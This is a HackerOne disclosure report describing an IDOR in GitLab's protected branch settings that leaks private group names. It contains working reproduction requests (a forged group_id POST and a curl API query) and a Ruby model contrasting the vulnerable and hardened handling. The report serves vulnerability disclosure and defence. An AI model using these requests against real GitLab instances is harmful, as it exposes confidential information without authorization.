Private group names are disclosed through protected branch settings and API
Link: https://hackerone.com/reports/418011
By: @jobert
Details: The protected branch settings page and the respective API endpoints contain an Insecure Direct Object Reference (IDOR) that discloses the names of private groups the current user is not authorized to see.
Steps to reproduce
- Make sure that a group exists that the current user does not have access to; let's assume this private group was assigned ID `1`.
- Sign in as a user who is capable of creating a new project, e.g. as user `root`.
- Create a project, e.g. called `project`.
- Send the following request to the `Projects::ProtectedBranchesController#create` endpoint:

```http
POST /root/project/protected_branches HTTP/1.1
Host: gitlab-instance
...

{"authenticity_token":"<token>","protected_branch":{"name":"master","merge_access_levels_attributes":[{"group_id":2}],"push_access_levels_attributes":[{"group_id":2}]}}
```

- In the request above, the `group_id` parameters (for both `push_access` and `merge_access`, and perhaps also for `unprotect_access`) are vulnerable to an IDOR: change the `group_id` to the group whose name you want to obtain. In the protected branch settings page, it'll now look like this:
- Now query the `protected_branches` through the API:
```shell
$ curl -X GET -H 'Private-Token: <token>' http://gitlab-instance/api/v4/projects/1/protected_branches | jq
[
  {
    "name": "master",
    "push_access_levels": [
      {
        "access_level": 40,
        "access_level_description": "secret",
        "user_id": null,
        "group_id": 1
      }
    ],
    "merge_access_levels": [
      {
        "access_level": 40,
        "access_level_description": "secret",
        "user_id": null,
        "group_id": 1
      }
    ],
    "unprotect_access_levels": []
  }
]
```

- As can be seen above, the `access_level_description` discloses the private group's name.
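The root cause in the steps above is that a caller-supplied `group_id` is accepted without checking that the acting user may see that group. The following is an added example, not GitLab's code: a toy Ruby model of the access-level handling, with the vulnerable behaviour beside a hardened version. The group ids, names, member user ids, parameter keys and request body are constructed for illustration.

```ruby
require 'set'

# Constructed fixture (not real GitLab data): group id => name and member user ids.
GROUPS = {
  1 => { name: 'secret',  members: Set[42] },    # private; user 7 is not a member
  2 => { name: 'devteam', members: Set[7, 42] }, # user 7 is a member
}.freeze

ACCESS_KEYS = %w[push_access_levels_attributes
                 merge_access_levels_attributes
                 unprotect_access_levels_attributes].freeze

class UnauthorizedGroupError < StandardError; end

# Groups the acting user may reference. Assumption: membership is the only
# visibility rule in this toy model.
def visible_group_ids(user_id)
  GROUPS.select { |_, g| g[:members].include?(user_id) }.keys.to_set
end

# Shape of what the API later renders for each access level: the group's
# name becomes access_level_description.
def access_level_entry(key, group_id)
  { 'type' => key, 'group_id' => group_id,
    'access_level_description' => GROUPS.fetch(group_id)[:name] }
end

# Vulnerable version: group_id from the request is trusted as-is, so the
# name of any group, private ones included, is echoed back to the caller.
def create_access_levels_vulnerable(params)
  ACCESS_KEYS.flat_map do |key|
    (params[key] || []).map { |a| access_level_entry(key, a['group_id']) }
  end
end

# Hardened version: every group_id is checked against the user's visible
# groups before anything is persisted or rendered.
def create_access_levels_hardened(user_id, params)
  allowed = visible_group_ids(user_id)
  ACCESS_KEYS.flat_map do |key|
    (params[key] || []).map do |a|
      gid = a['group_id']
      raise UnauthorizedGroupError, "group #{gid} not visible to user #{user_id}" unless allowed.include?(gid)
      access_level_entry(key, gid)
    end
  end
end

# Constructed request body mirroring the report, with group_id set to the private group.
PROBE = {
  'push_access_levels_attributes'  => [{ 'group_id' => 1 }],
  'merge_access_levels_attributes' => [{ 'group_id' => 1 }],
}.freeze
```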
Impact
Private group names are considered to be confidential information. An attacker can easily enumerate the IDs, as they are auto-incremented. This feature is only available on GitLab EE, which makes this issue exploitable on gitlab.com's Free tier.